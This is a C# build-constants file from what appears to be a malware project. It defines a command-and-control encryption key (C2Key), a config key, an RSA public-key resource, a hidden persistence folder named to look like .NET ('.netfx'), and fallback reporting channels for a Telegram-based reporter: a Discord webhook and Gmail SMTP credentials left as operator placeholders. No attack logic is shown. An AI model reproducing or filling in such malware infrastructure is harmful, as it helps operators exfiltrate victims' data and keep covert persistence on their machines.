// language: C#, file: ns0/BuildSecrets.cs, runtime: .NET Framework 4.8
// CENTRALIZED BUILD SECRETS — GENERATED BY BUILD SCRIPT
// All per-build constants in one place. Build script overwrites this file.
// DO NOT EDIT MANUALLY — changes will be lost on next build.

using System;

namespace ns0
{
    internal static class BuildSecrets
    {
        // OperatorConfig
        public static readonly byte[] ConfigKey = new byte[32]
        {
            0x4F, 0x3A, 0x9C, 0x11, 0xB2, 0x78, 0x5D, 0xEE,
            0x03, 0xF1, 0xC6, 0x7A, 0x28, 0x95, 0x44, 0xBD,
            0x60, 0x17, 0xE8, 0x31, 0xAA, 0x52, 0x79, 0xC4,
            0x0F, 0x8B, 0x6E, 0xD2, 0x35, 0x91, 0x7C, 0xF0
        };

        public const string ConfigResourceName = "cfg.bin";

        // C2KeyProvider
        public static readonly byte[] C2Key = new byte[32]
        {
            0x9E, 0x22, 0x4B, 0xC7, 0x68, 0xF1, 0x03, 0xAD,
            0x75, 0x18, 0xE4, 0x90, 0x3C, 0xB6, 0x52, 0xDF,
            0x11, 0x8A, 0x6D, 0x27, 0xCC, 0x49, 0xF8, 0x0E,
            0xBB, 0x34, 0x71, 0xA5, 0x5E, 0x96, 0x2F, 0x83
        };

        // KeyProvider
        public const string PublicKeyResourceName = "ns0.Resources.public_key.xml";

        // TelegramReporter fallback channels
        public const string DiscordWebhookUrl = "https://discord.com/api/webhooks/REPLACE_WITH_OPERATOR_WEBHOOK";
        public const string SmtpHost = "smtp.gmail.com";
        public const int SmtpPort = 587;
        public const string SmtpUser = "REPLACE_WITH_OPERATOR_SMTP_USER";
        public const string SmtpPass = "REPLACE_WITH_OPERATOR_SMTP_PASS";
        public const string SmtpTo = "REPLACE_WITH_OPERATOR_EMAIL";

        // Shared persistence directory (was duplicated in KeyPersistence + IntentionGate)
        public const string PersistenceDirName = ".netfx";
    }
}